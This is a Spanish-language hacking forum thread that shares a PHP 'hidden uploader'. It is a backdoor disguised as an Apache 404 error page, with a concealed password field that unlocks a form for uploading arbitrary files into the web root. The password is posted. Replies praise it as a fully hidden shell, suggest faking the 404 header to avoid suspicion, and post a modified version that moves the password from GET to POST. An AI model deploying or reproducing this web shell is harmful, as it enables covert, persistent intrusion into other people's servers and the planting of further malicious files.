Uploader oculto

Decode · Agosto 26, 2014, 09:39:18 PM

Hola gente,aquí les dejo un uploader oculto:

Código: php

<title>404 Not Found</title>
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method="post"><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(empty($_FILES["A"])==0){ 
if(move_uploaded_file($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";} 
}else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}exit();}} 
?>

Password: upload

Saludos.

0b3Y · Agosto 27, 2014, 02:47:37 PM

Genial!, me encanta este tipo de shells, totalmente ocultas

. Unicamente... podrias hacer que no apareciera la password en la url??

BigBear · Agosto 27, 2014, 03:38:13 PM

yo tambien uso lo mismo para mis tools en php.

fermino · Agosto 28, 2014, 04:59:09 PM

Buenísimo! Lo uníco que agregaría es un header() con el 404 para que cualquiera que ande con una extensión que le permita ver las headers no sospeche...

Jimeno · Agosto 30, 2014, 03:22:52 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas . Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.

Si envías la pass por el método POST no aparecerá en la URL.

blackdrake · Agosto 30, 2014, 03:56:43 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas . Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.

Si envías la pass por el método POST no aparecerá en la URL.

Para los que no saben, habría que editar las siguientes lineas por estas:

Código: php

 <form><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_GET["pw"])==0){if(md5($_GET["pw"])=="202cb962ac59075b964b07152d234b70")

Por:

Código: php

 <form method="post"><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="202cb962ac59075b964b07152d234b70")

Un saludo.

Uploader oculto

Decode

Agosto 26, 2014, 09:39:18 PM Ultima modificación: Julio 17, 2018, 05:31:44 PM por Decode

0b3Y

Agosto 27, 2014, 02:47:37 PM #1

BigBear

Agosto 27, 2014, 03:38:13 PM #2

fermino

Agosto 28, 2014, 04:59:09 PM #3

Jimeno

Agosto 30, 2014, 03:22:52 PM #4

blackdrake

Agosto 30, 2014, 03:56:43 PM #5